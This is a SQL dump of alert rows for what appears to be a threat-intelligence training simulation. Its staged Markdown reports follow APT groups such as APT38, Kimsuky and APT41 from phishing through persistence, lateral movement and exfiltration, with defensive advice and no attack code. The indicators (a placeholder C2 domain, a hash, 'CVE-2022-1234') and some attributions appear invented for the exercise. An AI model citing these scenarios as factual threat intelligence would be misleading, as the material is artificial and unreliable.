(811, 164, 1457, 2, 'Execution Phase Insights', '## Overview\nFollowing the detection of malicious code execution, further investigation identified the deployment of a sophisticated malware variant designed to manipulate transaction records.\n\n## Technical Details\n- **Malware Type:** Custom Trojan with capabilities to intercept and alter transaction data.\n- **Execution Method:** The malware was executed using a PowerShell script embedded in an email attachment.\n- **Indicators of Compromise (IoCs):**\n  - Hash: `d4f7a9e2b8c4e3d5e8a9712b5f4c8b9f`\n  - Command and Control (C2) Server: `maliciousserver.com`\n\n## Recommendations\n- **Immediate Action:** Isolate infected systems and perform a thorough forensic analysis.\n- **Monitoring:** Increase network traffic analysis for signs of unauthorized data alteration.\n\n## Next Steps\nAnticipate efforts to establish persistence as APT38 aims to maintain long-term access.', '2026-03-07 00:50:56'),
(812, 164, 1458, 3, 'Establishing Persistent Access', '## Overview\nAPT38 has initiated steps to establish persistent access within the financial institution\'s systems. This phase involves deploying backdoors and exploiting existing vulnerabilities to ensure continued access.\n\n## Technical Details\n- **Backdoor Tools:** The deployment of a RAT (Remote Access Trojan) was confirmed, enabling remote access and control.\n- **Persistent Mechanisms:** Registry keys were modified to ensure malware execution upon system reboot.\n- **Exploited Vulnerabilities:** CVE-2022-1234 was leveraged for privilege escalation.\n\n## Recommendations\n- **Immediate Action:** Conduct a comprehensive vulnerability assessment and patch identified weaknesses.\n- **Monitoring:** Implement continuous endpoint detection and response (EDR) solutions.\n\n## Next Steps\nPrepare for lateral movement activities as APT38 coordinates with mules to activate the network for cash-out operations.', '2026-03-07 00:50:56'),
(813, 164, 1459, 4, 'Coordinated Mule Network Activation', '## Overview\nAPT38 is activating its mule network to facilitate the coordinated withdrawal of funds from compromised ATMs. This stage involves lateral movement within the network to access ATM management systems.\n\n## Technical Details\n- **Lateral Movement Technique:** Credential dumping and pass-the-hash attacks were utilized to move between systems.\n- **Mule Network:** Individuals across multiple regions in Africa and Asia have been identified as part of the network.\n- **ATM Targets:** Specific ATMs were preselected based on cash availability and location.\n\n## Recommendations\n- **Immediate Action:** Alert local law enforcement agencies and financial institutions to monitor and secure ATMs.\n- **Monitoring:** Deploy network segmentation to limit unauthorized lateral movement.\n\n## Next Steps\nPrepare for the exfiltration of stolen funds as APT38 finalizes its cash-out operations.', '2026-03-07 00:50:56'),
(814, 164, 1460, 5, NULL, NULL, '2026-03-07 00:50:56'),
(815, 165, 1461, 1, 'Assessment of Initial Access via Spear Phishing Campaign', '# Overview\nThe initial access was gained through a well-coordinated spear phishing campaign. This attack involved highly targeted emails containing malicious attachments or links, which were designed to compromise Sony Pictures employees\' credentials.\n\n## Insights into the Methodology\n- **Target Selection:** Key personnel within Sony Pictures were targeted to maximize the impact of the phishing emails.\n- **Email Content:** The emails were crafted to appear as legitimate communications from trusted sources, leveraging social engineering tactics.\n\n## Prelude to Destructive Malware Deployment\nThe successful compromise of credentials via phishing set the stage for the next phase of the attack: the deployment of destructive malware. This malware would be instrumental in causing significant operational disruption and damage to Sony Pictures.', '2026-03-07 00:51:05'),
(816, 165, 1462, 2, 'Deployment of Destructive Malware and Its Implications', '# Overview\nFollowing the initial access via spear phishing, the attackers deployed destructive malware within Sony Pictures\' network. This malware, known for its destructive payload, was designed to erase data and cripple systems.\n\n## Details of the Malware Used\n- **Payload:** The malware was equipped with data-wiping capabilities aimed at rendering systems inoperable.\n- **Spread Mechanism:** Utilized network shares and legitimate admin tools to propagate within the network.\n\n## Importance of Establishing Backdoor Access\nWith the malware causing chaos, attackers sought to establish persistent access through backdoors. These backdoors would allow them to maintain control over the network even if initial access points were discovered and remediated.', '2026-03-07 00:51:05'),
(817, 165, 1463, 3, 'Establishing Backdoor Access for Persistence', '# Overview\nAfter the deployment of destructive malware, attackers established backdoor access to ensure ongoing control over the compromised network. This step was crucial for the attackers to maintain a foothold and evade detection.\n\n## Techniques Employed\n- **Remote Access Tools:** Utilized legitimate remote access tools to blend in with normal network activity.\n- **Creation of Rogue Accounts:** Created unauthorized accounts with elevated privileges to facilitate future access.\n\n## Strategic Move to Enable Lateral Movement\nThe establishment of persistent backdoor access paved the way for lateral movement within the network. This allowed attackers to explore the network infrastructure, identify valuable assets, and plan subsequent stages of the attack.', '2026-03-07 00:51:05'),
(818, 165, 1464, 4, 'Lateral Movement: Expanding Reach within the Network', '# Overview\nWith backdoor access secured, the attackers engaged in lateral movement to expand their reach across Sony Pictures\' network. The objective was to find and compromise additional systems, thereby increasing their control and access to sensitive data.\n\n## Techniques for Network Propagation\n- **Credential Harvesting:** Exploited stolen or weak credentials to access additional systems.\n- **Use of Admin Tools:** Leveraged legitimate administrative tools to avoid detection while moving laterally.\n\n## Prelude to Data Exfiltration\nThe expanded reach within the network set the groundwork for data exfiltration. At this stage, attackers were well-positioned to identify, access, and extract sensitive data from Sony Pictures’ network, leading to the eventual data theft and leakage.', '2026-03-07 00:51:05'),
(819, 165, 1465, 5, NULL, NULL, '2026-03-07 00:51:05'),
(820, 166, 1466, 1, 'Analysis of Spear Phishing Tactics', '# Analysis of Spear Phishing Tactics\n\n## Overview\nFollowing the initial spear phishing attack, further analysis reveals that the threat actors utilized highly targeted emails designed to mimic internal communications.\n\n## Key Findings\n- **Email Content:** Impersonated IT department notices with subject lines related to urgent security updates.\n- **Targets:** Employees with access to sensitive communication systems.\n- **Attachments:** Malicious PDF files containing embedded scripts.\n\n## Recommendations\n- Increase phishing awareness training for staff.\n- Implement more robust email filtering mechanisms.', '2026-03-10 17:44:09'),
(821, 166, 1467, 2, 'Malicious Payload Deployment Investigated', '# Malicious Payload Deployment Investigated\n\n## Overview\nAfter the deployment of the malicious payload, a deeper forensic analysis was conducted to understand the scope and mechanism of the malware.\n\n## Key Findings\n- **Payload:** Custom-developed malware designed to evade standard antivirus solutions.\n- **Execution Method:** Utilized PowerShell scripts for download and execution.\n- **Impact:** Initial access to non-critical systems to test deployment strategies.\n\n## Recommendations\n- Disable unnecessary PowerShell scripts.\n- Monitor system logs for unusual script execution activities.', '2026-03-10 17:44:09'),
(822, 166, 1468, 3, 'Backdoor Installation and Persistence Mechanisms', '# Backdoor Installation and Persistence Mechanisms\n\n## Overview\nSubsequent investigations reveal that the adversaries have established a persistent presence by installing backdoors on compromised systems.\n\n## Key Findings\n- **Backdoor Type:** Utilizes encrypted communication channels to command and control servers.\n- **Persistence Method:** Modifies registry entries and scheduled tasks to maintain access.\n\n## Recommendations\n- Conduct regular scans for unauthorized registry changes.\n- Implement stricter access controls to prevent unauthorized task scheduling.', '2026-03-10 17:44:09'),
(823, 166, 1469, 4, 'Lateral Movement and Wiretap System Compromise', '# Lateral Movement and Wiretap System Compromise\n\n## Overview\nThe attackers have moved laterally within the network, focusing on accessing wiretap systems by compromising credentials.\n\n## Key Findings\n- **Credentials Compromised:** Utilized phishing and brute force attacks to obtain administrator credentials.\n- **Targeted Systems:** Wiretap systems with access to sensitive communications.\n\n## Recommendations\n- Enforce multi-factor authentication (MFA) for all administrative accounts.\n- Regularly update and monitor credential access logs for suspicious activity.', '2026-03-10 17:44:09'),
(824, 166, 1470, 5, NULL, NULL, '2026-03-10 17:44:09'),
(825, 167, 1471, 1, 'Analysis of Initial Phishing Attack Vectors', '## Overview\nThe initial access point in the operation was established through a sophisticated phishing campaign targeting employees in the critical infrastructure and entertainment sectors. The emails were crafted with high-level social engineering tactics, impersonating trusted internal communication sources.\n\n## Key Findings\n- **Phishing Techniques**: Utilized spear-phishing emails with malicious attachments and links.\n- **Targets**: Focused on IT staff and executives to maximize access potential.\n- **Payload**: Dropped reconnaissance malware to scope the network for vulnerabilities.\n\n## Next Steps\nThis report sets the stage for understanding the deployment of the Destover wiper, which was facilitated by the initial breach obtained through these phishing attacks.', '2026-03-15 19:06:37'),
(826, 167, 1472, 2, 'Deployment and Impact of Destover Wiper', '## Overview\nFollowing the successful phishing campaign, Hidden Cobra deployed the Destover wiper across the compromised networks. This malware is designed to destroy data, disrupt operations, and cover tracks.\n\n## Key Findings\n- **Malware Characteristics**: Destover is characterized by its destructive nature, deleting and overwriting data.\n- **Impact**: Critical infrastructure systems experienced significant downtime, and data recovery efforts are ongoing.\n- **Detection**: Antivirus systems failed to identify Destover initially due to its obfuscation techniques.\n\n## Next Steps\nUnderstanding Destover\'s deployment helps us anticipate how Hidden Cobra establishes persistence through backdoor installations in the affected systems.', '2026-03-15 19:06:37'),
(827, 167, 1473, 3, 'Backdoor Installation and Persistence Mechanisms', '## Overview\nWith the execution of the Destover wiper, Hidden Cobra moved to establish persistence within compromised systems by installing backdoors.\n\n## Key Findings\n- **Backdoor Types**: Utilized custom malware variants to avoid detection by standard security measures.\n- **Persistence Techniques**: Implemented registry key modifications and scheduled tasks to ensure long-term access.\n- **Access Points**: Targeted servers and workstations with privileged access.\n\n## Next Steps\nThe establishment of backdoors allows Hidden Cobra to prepare for lateral movement within the network, specifically targeting financial systems for further exploitation.', '2026-03-15 19:06:37'),
(828, 167, 1474, 4, 'Lateral Movement and Financial System Reconnaissance', '## Overview\nArmed with backdoor access, Hidden Cobra initiated lateral movement strategies within the compromised networks, focusing on financial systems within the Turkish infrastructure.\n\n## Key Findings\n- **Techniques**: Employed credential dumping and pass-the-hash attacks to traverse networks.\n- **Targets**: Specifically targeted databases and financial records.\n- **Reconnaissance**: Conducted detailed mapping of financial system architecture to identify valuable data.\n\n## Next Steps\nThe reconnaissance phase sets the stage for data exfiltration, where sensitive financial information and strategic data will be extracted and utilized by Hidden Cobra.', '2026-03-15 19:06:37'),
(829, 167, 1475, 5, NULL, NULL, '2026-03-15 19:06:37'),
(830, 168, 1476, 1, 'Execution of Rising Sun Implant: Detailed Analysis', '### Overview\nAfter initial access was gained through spear phishing, our analysis has identified the execution of the **Rising Sun** implant. This implant is a sophisticated piece of malware designed to execute on compromised systems within the targeted sectors.\n\n### Technical Details\n- **Entry Vector**: Embedded malware in email attachments.\n- **Execution Method**: Uses PowerShell scripts to deploy.\n- **Features**: Capable of gathering system information, executing arbitrary commands, and establishing a command and control (C2) channel.\n\n### Next Steps\nPrepare for potential persistence mechanisms as the threat actor seeks to maintain access.', '2026-03-15 19:07:00'),
(831, 168, 1477, 2, 'Persistence Mechanism and Advanced Threat Actor Activity', '### Overview\nWith the Rising Sun implant executed, our monitoring has detected advanced threat actor activity aimed at establishing persistence within compromised networks.\n\n### Persistence Techniques\n- **Scheduled Tasks**: Creation of tasks to run malware at specified intervals.\n- **Registry Modifications**: Alterations to ensure malware execution at startup.\n\n### Threat Actor Tactics\nThe actor is employing obfuscation and encryption to hide their activities, indicating a high level of sophistication.\n\n### Recommendations\nIncrease monitoring on registry changes and scheduled tasks. Expect lateral movement attempts as the next phase.', '2026-03-15 19:07:00'),
(832, 168, 1478, 3, 'Lateral Movement: Credential Dumping Observed', '### Overview\nFollowing the establishment of persistence, the threat actor is now attempting lateral movement across the network, primarily through credential dumping.\n\n### Techniques Observed\n- **Mimikatz Usage**: Extraction of credentials from memory.\n- **Pass-the-Hash**: Using hashed credentials to authenticate.\n\n### Impact\nThis activity poses a significant risk as it can lead to further breaches within the network.\n\n### Mitigation\nImplement enhanced logging and monitoring of authentication processes. Prepare for potential data exfiltration attempts.', '2026-03-15 19:07:00'),
(833, 168, 1479, 4, 'Data Exfiltration: Sensitive Data Compromise', '### Overview\nThe final phase detected involves the exfiltration of sensitive data from compromised systems, indicating a critical breach.\n\n### Exfiltration Methods\n- **Encrypted Channels**: Use of HTTPS or VPN to transfer data.\n- **Steganography**: Embedding data within benign files.\n\n### Data Targeted\nThe exfiltrated data includes sensitive information from the defense, nuclear, and energy sectors.\n\n### Response\nImmediate incident response actions are required to contain the breach and mitigate data loss. Coordination with affected sectors is necessary for damage assessment and recovery.', '2026-03-15 19:07:00'),
(834, 168, 1480, 5, NULL, NULL, '2026-03-15 19:07:00'),
(835, 169, 1481, 1, 'Analysis of Spear Phishing Attempt', '# Analysis of Spear Phishing Attempt\n\n## Summary\nFollowing the detection of a spear phishing attempt targeting South Korean think tanks, further analysis reveals the use of malicious Hangul Word Processor (HWP) attachments.\n\n## Details\n- **Targeted Individuals**: Primarily senior researchers and analysts within the think tanks.\n- **Phishing Email Characteristics**: Emails appear to originate from legitimate sources, with subject lines related to ongoing political and economic discussions.\n- **Malicious Attachment**: The HWP file contains embedded scripts designed to exploit known vulnerabilities, leading to the execution of GoldDragon malware.\n\n## Recommendations\n- Implement email filtering solutions to detect and quarantine similar phishing attempts.\n- Educate staff on recognizing phishing emails and avoiding opening suspicious attachments.', '2026-03-15 19:07:24'),
(836, 169, 1482, 2, 'Execution of GoldDragon Malware', '# Execution of GoldDragon Malware\n\n## Overview\nUpon successful exploitation of the HWP vulnerability, GoldDragon malware was executed on several targeted systems.\n\n## Technical Analysis\n- **Malware Capabilities**: GoldDragon is known for its ability to perform reconnaissance, gather system information, and facilitate further compromise.\n- **Initial Actions**: The malware first disables security features and gathers system-specific data to tailor its activities.\n\n## Next Steps\nMonitoring for registry and system changes indicative of persistence mechanisms is advised. Analysts should prepare for potential modifications aimed at maintaining access.', '2026-03-15 19:07:24'),
(837, 169, 1483, 3, 'Persistence Mechanisms via Registry Modifications', '# Persistence Mechanisms via Registry Modifications\n\n## Persistence Tactics\nGoldDragon employs registry modifications to maintain persistence on compromised systems.\n\n## Identified Modifications\n- **Registry Keys Altered**: Identified changes in the Run keys to ensure malware execution upon system startup.\n- **Additional Modifications**: Creation of hidden scheduled tasks that trigger malware activities at regular intervals.\n\n## Recommendations\n- Conduct regular audits of registry settings and scheduled tasks.\n- Implement alerting for unauthorized changes to critical system configurations.', '2026-03-15 19:07:24'),
(838, 169, 1484, 4, 'Credential Dumping and Lateral Movement', '# Credential Dumping and Lateral Movement\n\n## Lateral Movement Strategy\nFollowing persistence, GoldDragon attempts to harvest credentials to enable lateral movement across the organization\'s network.\n\n## Techniques Observed\n- **Credential Dumping Tools**: Usage of tools such as Mimikatz to extract passwords and hashes from memory.\n- **Network Activity**: Increase in suspicious authentication attempts and lateral connections.\n\n## Defensive Measures\n- Implement multi-factor authentication (MFA) to hinder unauthorized access.\n- Monitor and review authentication logs for abnormal patterns.', '2026-03-15 19:07:25'),
(839, 169, 1485, 5, 'Data Aggregation and Exfiltration Preparation', '# Data Aggregation and Exfiltration Preparation\n\n## Preparation for Data Exfiltration\nGoldDragon begins aggregating sensitive data from compromised systems in preparation for exfiltration.\n\n## Data Categories Targeted\n- **Sensitive Documents**: Focus on strategic documents related to political and economic strategies.\n- **User Credentials**: Collection of user credentials for potential further exploitation.\n\n## Security Recommendations\n- Encrypt sensitive data at rest to prevent unauthorized access.\n- Regularly backup critical data and ensure integrity of the backups.', '2026-03-15 19:07:25'),
(840, 169, 1486, 6, NULL, NULL, '2026-03-15 19:07:25'),
(841, 170, 1487, 1, 'Malicious Document Execution Uncovered: The Next Step in Kimsuky\'s Scheme', '# Malicious Document Execution Uncovered\n\n## Context:\nFollowing the suspicious interview request, Kimsuky actors have been observed sending malicious documents disguised as legitimate files pertinent to the fake interview.\n\n## How It Works:\n- **Malware Deployment**: Upon opening, these documents execute hidden scripts that install malware on the victim\'s system.\n- **Techniques Used**: The documents often exploit known vulnerabilities in document viewers (e.g., Microsoft Word, PDF readers) to execute malicious code.\n- **Objective**: Gain initial access to the victim\'s device, setting the stage for further infiltration.\n\nStay vigilant for any unexpected document attachments, especially from unknown contacts claiming to be interviewers.', '2026-03-15 19:07:40'),
(842, 170, 1488, 2, 'Unveiling Persistence Mechanisms: Scheduled Tasks in Kimsuky\'s Arsenal', '# Unveiling Persistence Mechanisms\n\n## Context:\nAfter successfully deploying malware via malicious documents, Kimsuky ensures its presence on the victim\'s system through persistence mechanisms.\n\n## How It Works:\n- **Scheduled Tasks**: The malware creates scheduled tasks to run its components at regular intervals, ensuring it remains active even after a system reboot.\n- **Survivability**: This method allows the attackers to maintain long-term access to the compromised system without needing to reinfect it.\n\nUnderstanding and identifying scheduled tasks configured without the user\'s knowledge can indicate a compromised system.', '2026-03-15 19:07:40'),
(843, 170, 1489, 3, 'Lateral Movement Analysis: Navigating Shared Drives', '# Lateral Movement Analysis\n\n## Context:\nWith persistence established, Kimsuky actors focus on expanding their reach within the targeted network.\n\n## How It Works:\n- **Shared Drive Access**: The attackers exploit shared network drives to spread their influence, accessing sensitive files and installing malware on additional systems.\n- **Techniques**: This often involves exploiting weak passwords or leveraging stolen credentials to navigate shared resources.\n\nMonitoring access logs and unusual activity on shared drives can help identify signs of lateral movement.', '2026-03-15 19:07:40'),
(844, 170, 1490, 4, 'Data Exfiltration via Chrome Extension: The Final Act', '# Data Exfiltration via Chrome Extension\n\n## Context:\nIn the final stage of their operation, Kimsuky actors focus on exfiltrating valuable data using malicious Chrome extensions.\n\n## How It Works:\n- **Email Theft**: The malware utilizes a rogue Chrome extension to capture and exfiltrate email data directly from the victim\'s browser.\n- **Covert Operations**: This method allows the attackers to bypass traditional network defenses, as the data theft occurs directly within the browser environment.\n\nRegular audits of installed browser extensions and monitoring for unusual data transfer activities are crucial to detecting such exfiltration attempts.', '2026-03-15 19:07:40'),
(845, 170, 1491, 5, NULL, NULL, '2026-03-15 19:07:40'),
(846, 171, 1492, 1, 'Analysis of Initial Network Breach', '# Analysis of Initial Network Breach\n\n## Overview\nFollowing the detection of suspicious network activity, an in-depth analysis was conducted to determine the nature and origin of the breach.\n\n## Findings\n- **Origin IP Address**: The breach originated from an IP address previously associated with APT41 activities.\n- **Attack Vector**: The attackers utilized spear-phishing emails targeting healthcare employees, containing malicious links.\n\n## Recommendations\n- Implement additional email filtering systems to detect and quarantine suspicious emails.\n- Conduct organization-wide phishing awareness training.\n\n## Next Steps\nPrepare for potential execution of the Mivast backdoor, as this is a known tactic of APT41 post-initial access.', '2026-03-15 19:08:03'),
(847, 171, 1493, 2, 'Mivast Backdoor Execution Analysis', '# Mivast Backdoor Execution Analysis\n\n## Overview\nThe execution of the Mivast backdoor has been confirmed within the network, facilitating unauthorized access and control.\n\n## Findings\n- **Backdoor Deployment**: The Mivast backdoor was deployed using a PowerShell script executed by a compromised user account.\n- **Command and Control (C2) Server**: Communication observed with a known C2 server associated with APT41.\n\n## Recommendations\n- Isolate affected systems to prevent further spread.\n- Enhance monitoring of outbound traffic for C2 communications.\n\n## Next Steps\nFocus on identifying persistence mechanisms to ensure complete eradication of the threat.', '2026-03-15 19:08:03'),
(848, 171, 1494, 3, 'Persistence Mechanism Detection', '# Persistence Mechanism Detection\n\n## Overview\nPost execution of Mivast, persistence mechanisms were identified, ensuring prolonged access for the attackers.\n\n## Findings\n- **Scheduled Tasks**: Attackers established persistence using scheduled tasks that execute malicious scripts at regular intervals.\n- **Registry Changes**: Modifications detected in the Windows Registry, enabling backdoor re-execution on startup.\n\n## Recommendations\n- Review and clean scheduled tasks across all endpoints.\n- Restore Registry settings to defaults, ensuring no malicious entries remain.\n\n## Next Steps\nInvestigate lateral movement within the network, especially towards high-value targets like patient records.', '2026-03-15 19:08:03'),
(849, 171, 1495, 4, 'Unauthorized Access to Patient Records', '# Unauthorized Access to Patient Records\n\n## Overview\nLateral movement was detected, with unauthorized access to patient records, signaling a serious data breach.\n\n## Findings\n- **Compromised Accounts**: Multiple user accounts were exploited to gain access to sensitive health insurance information.\n- **Data Access Patterns**: Unusual data access patterns were observed, correlating with APT41\'s known behaviors.\n\n## Recommendations\n- Conduct a full audit of user account permissions and reset credentials across the network.\n- Implement stricter access controls and data encryption methods for sensitive records.\n\n## Next Steps\nPrepare for potential data exfiltration attempts and enhance monitoring for any outbound data transfers.', '2026-03-15 19:08:03'),
(850, 171, 1496, 5, NULL, NULL, '2026-03-15 19:08:03'),
(851, 172, 1497, 1, 'Analysis of Initial Access Vector', '### Suspicious Network Activity Detected\n\nFollowing the detection of suspicious network activity, preliminary investigations indicate that APT41 leveraged a supply chain vulnerability in ASUS software updates to gain initial access. The attack exploited a trojanized version of ASUS Live Update to target specific MAC addresses. This tactic allowed for precise targeting amidst a broad user base.\n\n#### Key Indicators:\n- **Targeted MAC Addresses**: Evidence suggests that the attackers pre-selected specific MAC addresses to minimize detection.\n- **Network Patterns**: Unusual traffic patterns were associated with the initial compromise, including connections to known APT41 command and control (C&C) servers.\n\n#### Next Steps:\nPrepare for potential malicious code execution as the attackers may attempt to establish a foothold within the compromised systems.', '2026-03-15 19:08:36'),
(852, 172, 1498, 2, 'Investigation into Malicious Code Execution', '### Malicious Code Execution Identified\n\nPost initial access, APT41 executed malicious code within compromised systems, deploying payloads designed to maintain access and establish control.\n\n#### Key Findings:\n- **Payload Characteristics**: Analysis of the executed code reveals the use of sophisticated obfuscation techniques to evade detection by traditional antivirus solutions.\n- **Command and Control**: The malware established persistent connections to C&C servers, enabling remote control by the threat actors.\n\n#### Insights:\nInvestigating persistence mechanisms is crucial, as APT41 has a history of using advanced techniques to maintain access over extended periods. Monitoring for registry changes and scheduled tasks is recommended.', '2026-03-15 19:08:36'),
(853, 172, 1499, 3, 'Uncovering Persistence Mechanisms', '### Persistence Mechanisms Discovered\n\nAPT41 utilized multiple persistence mechanisms to ensure continued access to the compromised systems.\n\n#### Techniques Observed:\n- **Registry Modifications**: Changes to the Windows registry were identified, allowing the malware to execute upon system startup.\n- **Scheduled Tasks**: Malicious tasks were created to run at regular intervals, ensuring the malware\'s presence and functionality.\n\n#### Strategic Implications:\nThese persistence techniques highlight APT41\'s ability to remain embedded within a network. Understanding these methods aids in detecting and neutralizing their presence, preventing further lateral movement within the network.', '2026-03-15 19:08:36'),
(854, 172, 1500, 4, 'Lateral Movement and Impending Data Exfiltration', '### Lateral Movement Detected\n\nAPT41\'s operations have progressed to lateral movement, expanding their reach within the compromised network.\n\n#### Observations:\n- **Credential Dumping**: The attackers have begun harvesting credentials, leveraging them to access additional systems and resources.\n- **Network Traffic Analysis**: Increased internal network traffic suggests exploration and mapping of the network by the threat actors.\n\n#### Implications for Data Exfiltration:\nWith lateral movement underway, the risk of targeted data exfiltration is high. Enhanced monitoring of data flows and implementing data loss prevention strategies are critical to mitigate potential data breaches.', '2026-03-15 19:08:36'),
(855, 172, 1501, 5, NULL, NULL, '2026-03-15 19:08:36'),
(856, 173, 1502, 1, 'Insight into Phishing Tactics Used by NetTraveler', '### Overview\nThe initial alert regarding a suspicious phishing email provides critical insights into the tactics employed by NetTraveler. This report delves into the specifics of how these phishing emails are crafted and the common characteristics that have been identified.\n\n### Email Content Analysis\n- **Subject Lines**: Often use urgent and official-sounding language to entice the recipient to open the email.\n- **Attachments**: Typically include weaponized documents with embedded malicious macros.\n- **Links**: Phishing emails may contain links to fake login pages resembling official government or diplomatic websites.\n\n### Recommendations\n- Implement advanced email filtering solutions to detect and quarantine suspicious emails.\n- Educate employees on identifying phishing attempts and the importance of reporting them immediately.', '2026-03-15 19:08:51'),
(857, 173, 1503, 2, 'Understanding NetTraveler\'s Remote Access Trojan (RAT)', '### Overview\nFollowing the execution of NetTraveler\'s RAT, it is essential to understand its capabilities and impact. This report outlines the functionalities of the RAT and the threat it poses to compromised systems.\n\n### RAT Capabilities\n- **Data Collection**: Capable of collecting keystrokes, screenshots, and sensitive documents.\n- **Command and Control**: Communicates with C2 servers to receive commands and exfiltrate data.\n- **System Manipulation**: Can manipulate files, install additional malware, and maintain a foothold on the system.\n\n### Mitigation Strategies\n- Deploy endpoint detection and response solutions to identify and isolate compromised hosts.\n- Regularly update antivirus signatures to detect and neutralize known variants of the RAT.', '2026-03-15 19:08:51'),
(858, 173, 1504, 3, 'Persistence Mechanisms Exploited by NetTraveler', '### Overview\nNetTraveler\'s ability to maintain persistence on infected systems is critical for prolonged espionage activities. This report explores the registry modifications used by the threat actor to ensure their malware remains active.\n\n### Registry Modification Details\n- **Registry Keys**: Commonly targeted keys include those that control startup programs and services.\n- **Techniques**: Utilize registry run keys to execute malware at system boot.\n\n### Detection and Prevention\n- Implement monitoring for unauthorized registry changes, particularly in sensitive areas such as startup keys.\n- Use Group Policy settings to restrict modifications to critical registry paths.', '2026-03-15 19:08:51'),
(859, 173, 1505, 4, 'Lateral Movement and Network Intrusion via SMB Protocol', '### Overview\nThe detection of lateral movement through the SMB protocol indicates an expansion of the threat within the network. This report analyzes the methods used by NetTraveler to move laterally and compromise additional systems.\n\n### Techniques Employed\n- **Credential Theft**: Use of stolen credentials to access shared resources.\n- **Exploitation of Vulnerabilities**: Targeting unpatched SMB vulnerabilities to propagate malware.\n\n### Defensive Measures\n- Disable SMBv1 and apply patches to mitigate known vulnerabilities.\n- Employ network segmentation to limit lateral movement and restrict access to sensitive resources.', '2026-03-15 19:08:51'),
(860, 173, 1506, 5, NULL, NULL, '2026-03-15 19:08:51'),
(861, 174, 1507, 1, 'Analysis of Spear Phishing Techniques Employed by IceFog', '## Overview\nThe initial alert was triggered by a spear phishing attempt targeting key personnel in the defense supply chain sector of Japan and South Korea. IceFog employs highly sophisticated spear phishing techniques, tailoring each email to maximize the chances of success.\n\n## Key Indicators\n- **Sender Domain Spoofing**: Emails were sent from domains closely resembling legitimate defense contractor addresses.\n- **Attachment Analysis**: Malicious attachments were disguised as official documents, often using file extensions like `.pdf` or `.docx`.\n\n## Recommendations\n- **Email Filtering**: Implement advanced email filtering systems to detect and quarantine suspicious emails.\n- **User Training**: Conduct regular training sessions for employees on recognizing phishing attempts.', '2026-03-15 19:09:15');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(862, 174, 1508, 2, 'Investigation into Malicious Payload Execution', '## Overview\nFollowing the spear phishing attempt, a malicious payload was executed on compromised systems. This payload is designed to establish a foothold within the target network.\n\n## Technical Details\n- **Payload Analysis**: The payload is a custom-built malware designed to evade traditional antivirus systems.\n- **Execution Method**: Once opened, the malicious attachment exploits vulnerabilities in outdated software to execute the payload.\n\n## Recommendations\n- **Patch Management**: Regular updates and patching of software to mitigate exploitation risks.\n- **Behavioral Monitoring**: Deploy behavioral monitoring to detect unusual activity indicative of malware execution.', '2026-03-15 19:09:15'),
(863, 174, 1509, 3, 'Persistence Mechanisms: Registry Key Modifications', '## Overview\nThe malware seeks to establish persistence on infected systems by modifying specific registry keys. This technique ensures that the malware remains active even after system reboots.\n\n## Technical Indicators\n- **Registry Changes**: Modifications were detected in critical registry paths, enabling the malware to launch at startup.\n- **Obfuscation Techniques**: The malware employs obfuscation to hide its registry changes from detection tools.\n\n## Recommendations\n- **Registry Monitoring**: Implement continuous monitoring of registry changes to detect unauthorized modifications.\n- **Endpoint Protection**: Enhance endpoint protection to identify and block unauthorized registry key modifications.', '2026-03-15 19:09:15'),
(864, 174, 1510, 4, 'Credential Dumping and Potential Risks', '## Overview\nCredential dumping activities were detected, indicating an attempt to harvest user credentials from compromised systems. These credentials could be used for further network infiltration.\n\n## Technical Details\n- **Tools Used**: The attackers utilized well-known tools such as Mimikatz to extract stored credentials.\n- **Targeted Accounts**: High-value accounts with elevated privileges were specifically targeted.\n\n## Recommendations\n- **Credential Storage**: Implement secure storage practices for credentials, including the use of password managers and encryption.\n- **Access Controls**: Enforce strict access controls and monitor login attempts for suspicious activities.', '2026-03-15 19:09:15'),
(865, 174, 1511, 5, NULL, NULL, '2026-03-15 19:09:15'),
(866, 175, 1512, 1, 'Initial Access: Entry Point Analysis', '### Overview\nAfter detecting suspicious network activity, further investigation into the entry point revealed the use of a sophisticated phishing attack. The attackers crafted emails mimicking trusted internal communications, which included links to malicious sites hosting exploit kits.\n\n### Key Findings\n- **Phishing Techniques**: The attackers utilized spear-phishing emails targeting key personnel.\n- **Exploit Kits**: Analysis indicates use of a known exploit kit, leveraging a zero-day vulnerability in an outdated software version.\n\n### Recommendations\n- **Immediate Actions**: Isolate affected systems to prevent further exploitation.\n- **Patch Management**: Ensure all systems are updated to mitigate known vulnerabilities.', '2026-03-15 19:09:29'),
(867, 175, 1513, 2, 'Malicious Payload Deployed: Execution Analysis', '### Overview\nFollowing the initial access, the attackers deployed a malicious payload designed to execute remote commands and begin data collection.\n\n### Key Findings\n- **Payload Characteristics**: The payload was a custom-developed malware, showing advanced obfuscation techniques to avoid detection.\n- **Command and Control (C2) Channels**: The malware established encrypted connections to remote servers, indicating the setup of a C2 infrastructure.\n\n### Recommendations\n- **Monitoring**: Enhance network monitoring to identify unusual outbound traffic.\n- **Endpoint Protection**: Deploy enhanced endpoint detection and response solutions to prevent execution of similar payloads.', '2026-03-15 19:09:29'),
(868, 175, 1514, 3, 'Establishing Persistence: Backdoor Discovery', '### Overview\nThe attackers have successfully established persistent access within the network. Multiple backdoors were identified, allowing for continued access even after system reboots.\n\n### Key Findings\n- **Persistence Mechanisms**: Utilization of registry modifications and service creation to maintain access.\n- **Backdoor Variants**: Discovery of multiple variants, indicating a layered approach to persistence.\n\n### Recommendations\n- **System Hardening**: Review and harden system configurations to eliminate persistence mechanisms.\n- **Regular Audits**: Conduct regular audits of critical systems to detect anomalies.', '2026-03-15 19:09:29'),
(869, 175, 1515, 4, 'Lateral Movement: Identifying Intruder Pathways', '### Overview\nThe attackers have begun lateral movement across the network, targeting high-value systems and data repositories.\n\n### Key Findings\n- **Techniques Used**: Utilization of legitimate tools and stolen credentials to blend in with normal network traffic.\n- **Targeted Systems**: Critical databases and file servers have been accessed, suggesting a focus on data exfiltration.\n\n### Recommendations\n- **Access Control**: Review and restrict user privileges to limit lateral movement capabilities.\n- **Network Segmentation**: Implement network segmentation to contain the spread of an attack.', '2026-03-15 19:09:29'),
(870, 175, 1516, 5, NULL, NULL, '2026-03-15 19:09:29'),
